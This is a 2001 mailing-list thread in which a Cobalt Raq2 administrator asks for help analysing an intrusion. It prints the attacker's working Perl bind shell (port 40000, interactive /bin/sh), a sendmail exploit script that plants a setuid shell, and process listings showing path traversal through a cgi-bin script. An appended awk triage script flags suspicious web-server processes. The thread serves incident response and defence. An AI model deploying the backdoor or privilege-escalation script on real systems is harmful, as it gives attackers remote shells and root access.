
RE: [cobalt-users] Raq2 Hack



-----Original Message-----
From: cobalt-users-admin@xxxxxxxxxxxxxxx
[mailto:cobalt-users-admin@xxxxxxxxxxxxxxx]On Behalf Of Hacked Raq2
Sent: Sunday, August 19, 2001 9:59 AM
To: cobalt-users@xxxxxxxxxxxxxxx
Subject: [cobalt-users] Raq2 Hack


Hello all,

Well, it seems that I've had an intruder on my Raq2. What I'm trying to
figure out is how he got in. I have all the important patches applied and
I've shut down telnet in favor of running OpenSSH 2.9. I also run logcheck
and portsentry and usually keep a close eye on things.

What I'd like to do is just post some of the stuff I've found and see if
any of the security gurus might have an idea of what happened so I can
close things up. I realize that an OS Restore might be the only option, but I
would like to explore the depth of this h4x0r's intrusion.


Here are the processes that were running. It appears he only had the
privileges of HTTPD:

httpd    19108  0.0  0.6  3012   864  ?  S NAug 17   0:00 sh -c /home/sites/site19/cgi-bin/Mall/../../../../../../../../../../../../../../../../../../../../../../../../
httpd    19112  0.0  1.3  4748  1740  ?  S NAug 17   0:00 perl /tmp/shell.pl
httpd    19130  0.0  0.0     0     0  ?  Z NAug 17   0:00 (sh <zombie>)
httpd    19425  0.0  1.0  3720  1280  ?  S NAug 17   0:29 ./psybnc
httpd    20481  0.0  0.0     0     0  ?  Z NAug 17   0:00 (sh <zombie>)
httpd    20562  0.0  0.0     0     0  ?  Z NAug 17   0:00 (sh <zombie>)
httpd    22086  0.0  0.0     0     0  ?  Z NAug 17   0:00 (sh <zombie>)
httpd    22228  0.0  0.0     0     0  ?  Z NAug 17   0:00 (sh <zombie>)

I also see that he had some kind of IRC program running.

Here are the contents of the shell.pl that he had in /tmp:

#!/usr/bin/perl
# Bind shell: listens on TCP port 40000 and hands every connection an
# interactive /bin/sh running as whatever user started the script (here httpd).
require 5.002;
use Socket;
$protocol = getprotobyname('tcp');
socket(S, &PF_INET, &SOCK_STREAM, $protocol) || die "can't create socket\n";
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in(40000, INADDR_ANY)) || die "can't bind\n";
listen(S, 3) || die "can't listen\n";
while (1) {
    YOP: accept(THC, S) || goto YOP;
    if (!($pid = fork)) {
        goto BYE if (!defined $pid);
        # child: wire the client socket to stdin/stdout/stderr, then exec a shell
        open STDIN,  "<&THC"; open STDOUT, ">&THC";
        open STDERR, ">&THC";
        exec "/bin/sh -i" || print THC "couldn't spawn shell\n";
        close THC; exit 0;
    } else {
        BYE: close THC;
    }
}

Here is a list of the files he put into /tmp:

1 httpd     httpd      983040 May 22 10:07 psyBNC.tar
1 httpd     httpd       639341 Aug 19 01:13 psybnc
1 httpd     httpd        10240 Nov  7  1999 sendmail-8.9.3.tar
2 httpd     httpd         1024 Aug 19 01:48 sendmail89x
1 httpd     httpd          559 Aug 17 19:30 shell.pl
1 httpd     httpd            1 Aug 17 21:25 suid.sh

The directory sendmail89x has the following files in it:

529 Jul  2  1999 exploit.sh
1287 Jul  1  1999 sendmail.c

Here are the contents of exploit.sh:

#!/bin/sh
# rpmmail (sendmail 8.9.3/8.9.1 procmail 3.10.x)
# by icesk, greetz to that triq ass bitch from ATR, obsolete, and #b4b0
echo "[icesk] createing suid shellscript"
echo <<EOF > /tmp/suid.sh
#!/bin/sh
cp /bin/sh /tmp/sh;chmod +s /tmp/sh
EOF
chmod +x /tmp/suid.sh
echo "[icesk] `ls -l /tmp/suid.sh`"
echo "[icesk] compileing exploit"
gcc -o sendmail sendmail.c
echo "[icesk] expl01t1ng m41l f34r!@$"
./sendmail 127.0.0.1 /tmp/suid.sh
echo "[icesk] allow 10 minutes for mail to cycle then run /tmp/sh"
echo "[icesk] done."

If anyone could help me understand this exploit a little more and maybe give
me some ideas on where to look for his entry point, I would really
appreciate it.

TIA,
h4ck3d


If the intruder only had privileges of HTTPD, then it looks like he used
someone's file upload script (use CGI), which defaults to uploading to /tmp.

Did the shell.pl ever run to completion?

Sim
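
The ps listing above is the kind of thing worth checking on any web host, so here is a small triage script for it. This is an added example, not code from the original post or from Cobalt; it reads ps-style lines and flags processes owned by the web-server user that execute something under /tmp, are spawned shells (sh -c, sh -i, zombie sh), carry a run of ../ segments in their command line, or execute a relative path the way ./psybnc does. The web-server user name (httpd), the assumption that a TIME column like "0:29" immediately precedes the command, the pattern list, and the sample lines (constructed to resemble the post; the real command line of PID 19108 was truncated in the mail) are all assumptions of this example.

```shell
#!/bin/sh
# Triage helper for processes owned by the web-server user. Added example,
# not code from the original post or from Cobalt. Reads ps lines on stdin
# and prints "PID<TAB>reasons<TAB>command" for each suspicious process.
# Assumptions: the web-server user is "httpd" (override with WEBUSER=...),
# and each ps line has a TIME column ("0:29") right before the command.

WEBUSER="${WEBUSER:-httpd}"

# Constructed sample modelled on the ps output in the post (not the real
# lines; the real command line of PID 19108 was truncated in the mail).
SAMPLE_PS='httpd    19108  0.0  0.6  3012   864  ?  S N Aug 17   0:00 sh -c /home/sites/site19/cgi-bin/Mall/../../../../../../../../etc/passwd
httpd    19112  0.0  1.3  4748  1740  ?  S N Aug 17   0:00 perl /tmp/shell.pl
httpd    19130  0.0  0.0     0     0  ?  Z N Aug 17   0:00 (sh <zombie>)
httpd    19425  0.0  1.0  3720  1280  ?  S N Aug 17   0:29 ./psybnc
httpd    19500  0.0  1.0  3000   900  ?  S   Aug 17   0:00 /usr/sbin/httpd
root       101  0.0  0.5  1200   600  ?  S   Aug 17   0:01 /usr/sbin/sshd'

# flag_webserver_procs: stdin = ps lines, stdout = "PID<TAB>reasons<TAB>command"
flag_webserver_procs() {
    awk -v user="$WEBUSER" '
        $1 != user { next }                      # only the web-server user
        {
            # the command starts right after the TIME column (first "m:ss ")
            if (match($0, /[0-9]+:[0-9][0-9] +/))
                cmd = substr($0, RSTART + RLENGTH)
            else
                cmd = $0
            why = ""
            # anything executed out of /tmp (perl /tmp/shell.pl)
            if (cmd ~ /\/tmp\//)                              why = why "executes-from-tmp,"
            # a spawned shell: "sh -c ...", "sh -i", or a zombie "(sh <zombie>)"
            if (cmd ~ /(^|[ \/(])(ba)?sh( -[ic]| <zombie>)/)  why = why "shell-spawned,"
            # four or more ../ in a row, as in the cgi-bin/Mall line
            if (cmd ~ /\.\.\/\.\.\/\.\.\/\.\.\//)             why = why "path-traversal,"
            # relative path: cwd unknown from ps alone (./psybnc)
            if (cmd ~ /^\.\//)                                why = why "relative-path-exec,"
            if (why != "") {
                sub(/,$/, "", why)
                printf "%s\t%s\t%s\n", $2, why, cmd
            }
        }'
}

# Stand-alone demo on the constructed sample; on the box itself run
#   ps aux | flag_webserver_procs
printf '%s\n' "$SAMPLE_PS" | flag_webserver_procs
```

On a live box, pipe `ps aux` into flag_webserver_procs, then for each flagged PID look at `ls -l /proc/PID/cwd /proc/PID/exe` to learn where a relative-path binary such as ./psybnc really lives, and compare `netstat -an` against the port a backdoor binds (shell.pl above listens on 40000). One more check worth making on the artifacts in the post: exploit.sh writes its helper with `echo <<EOF > /tmp/suid.sh`, and echo ignores the here-document on its stdin, so the file ends up containing only a newline, which matches the 1-byte suid.sh in the /tmp listing; the sendmail step of that script therefore could not have produced a setuid /tmp/sh.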
_______________________________________________
cobalt-users mailing list
cobalt-users@xxxxxxxxxxxxxxx
To Subscribe or Unsubscribe, please go to:
http://list.cobalt.com/mailman/listinfo/cobalt-users